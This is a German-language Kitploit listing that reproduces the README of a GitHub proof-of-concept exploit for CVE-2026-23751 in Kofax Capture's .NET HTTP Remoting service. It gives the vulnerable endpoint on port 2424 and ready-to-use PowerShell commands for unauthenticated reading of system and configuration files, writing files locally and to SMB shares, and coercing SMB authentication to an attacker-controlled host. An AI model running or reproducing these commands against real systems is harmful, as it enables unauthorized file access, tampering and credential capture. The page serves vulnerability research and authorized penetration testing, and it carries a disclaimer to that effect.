Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/siebrum/cve-2026-23751-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubsiebrum/cve-2026-23751-poc

CVE-2026-23751-poc

Gepatchter RemotingClient zur Ausnutzung von CVE-2026-23751 (Tungsten Automation – Kofax Capture Unauthenticated File Read/Write und SMB-Zwang über .NET HTTP Remoting)

Repository anzeigen
vor 6h 36mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-23751-poc

Proof-of-Concept-Neuimplementierung der in Code White's NewRemotingTricks beschriebenen Technik, die auf Tungsten Automation Kofax Capture abzielt.

CVE-2026-23751

Titel: Tungsten Automation – Kofax Capture Unauthenticated File Read/Write und SMB-Coercion über .NET HTTP Remoting

CVE: CVE-2026-23751

Beschreibung

CVE-2026-23751 betrifft Tungsten Automation Kofax Capture und ermöglicht einem nicht authentifizierten Remote-Angreifer, mit einem von Kofax Capture ACService bereitgestellten .NET-HTTP-Remoting-Endpunkt zu interagieren.

Die Schwachstelle kann für Folgendes ausgenutzt werden:

  • Nicht authentifizierte beliebige Dateilesevorgänge
  • Nicht authentifizierte beliebige Dateischreibvorgänge
  • SMB-Authentifizierungs-Coercion
  • Zugriff auf lokale Dateien, auf die der Kofax-Capture-Dienst zugreifen kann
  • Zugriff auf entfernte Dateien über UNC-Pfade

Der PoC implementiert die relevante .NET-Remoting-Technik aus Code Whites NewRemotingTricks-Projekt neu.

Betroffener Endpunkt

Der PoC zielt auf den Kofax-Capture--HTTP-Remoting-Endpunkt ab:

ACService
root@kitploit:~
http://<target>:2424/ACService

Port 2424 ist der Standard-HTTP-Remoting-Port, der vom betroffenen Dienst verwendet wird.

Verwendung

Lokale Datei lesen

Das folgende Beispiel liest die Windows-Hosts-Datei vom Zielsystem:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts

Eine Kofax-Capture-Konfigurationsdatei kann auf ähnliche Weise gelesen werden:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml

Lokale Datei schreiben

Eine Datei kann an einen Speicherort geschrieben werden, auf den der Kofax-Capture-Dienst zugreifen kann, indem der Zielpfad gefolgt vom Inhalt angegeben wird:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld

In eine entfernte SMB-Freigabe schreiben

Dieselbe Funktionalität kann mit einem UNC-Pfad verwendet werden, um in eine entfernte SMB-Freigabe zu schreiben:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld

Die Möglichkeit, auf die entfernte Ressource zuzugreifen, hängt von den Berechtigungen und dem Sicherheitskontext des Kofax-Capture-Dienstes ab.

SMB-Coercion

Eine file://-URI kann angegeben werden, um das Ziel dazu zu bringen, auf eine entfernte SMB-Ressource zuzugreifen:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt

Dies kann dazu führen, dass sich der betroffene Host beim angreiferkontrollierten SMB-Server authentifiziert, abhängig von der Zielumgebung und ihrer Sicherheitskonfiguration.

Technischer Hintergrund

Die Schwachstelle betrifft die Verwendung von .NET HTTP Remoting durch den ACService von Kofax Capture.

.NET Remoting unterstützt verschiedene URI-Schemata und Objektserialisierungsmechanismen. Durch eine spezifische Interaktion mit dem bereitgestellten Remoting-Endpunkt kann ein nicht authentifizierter Client den Dienst dazu veranlassen, Dateisystemoperationen mit vom Client bereitgestellten Pfaden durchzuführen.

Der PoC demonstriert, wie dieses Verhalten verwendet werden kann, um:

  • Lokale Dateien abzurufen
  • Daten in lokale Dateien zu schreiben
  • Auf entfernte UNC/SMB-Pfade zuzugreifen
  • Zugriff auf entfernte file://-Ressourcen auszulösen

Der PoC demonstriert derzeit das Schreiben von Zeichenfolgendaten in Dateien. Andere Dateitypen und Payload-Formate können durch entsprechende Änderung des Quellcodes unterstützt werden.

Diese Implementierung basiert auf Forschung und Techniken, die in Folgendem vorgestellt werden:

Code White – NewRemotingTricks

https://github.com/codewhitesec/NewRemotingTricks/tree/main

Anforderungen

  • Windows
  • Netzwerkzugriff auf den Kofax-Capture-ACService des Ziels
  • Kofax-Capture-Instanz, die den betroffenen HTTP-Remoting-Endpunkt bereitstellt
  • RemotingClient_MBRO_Lazy.exe

Für die Ausnutzung ist keine Authentifizierung gegenüber dem Kofax-Capture-Dienst erforderlich.

Haftungsausschluss

Dieses Repository wird ausschließlich für Sicherheitsforschung, Schwachstellenvalidierung und autorisierte Penetrationstests bereitgestellt.

Verwenden Sie diesen PoC nicht gegen Systeme ohne ausdrückliche Autorisierung. Der Autor ist nicht verantwortlich für Schäden, Datenverlust, unbefugten Zugriff oder andere Folgen, die aus der missbräuchlichen Verwendung dieser Software resultieren.

Referenzen

  • CVE-2026-23751 — Tungsten Automation Kofax Capture Unauthenticated File Read/Write und SMB-Coercion über .NET HTTP Remoting
  • Code White – NewRemotingTricks
Tool herunterladen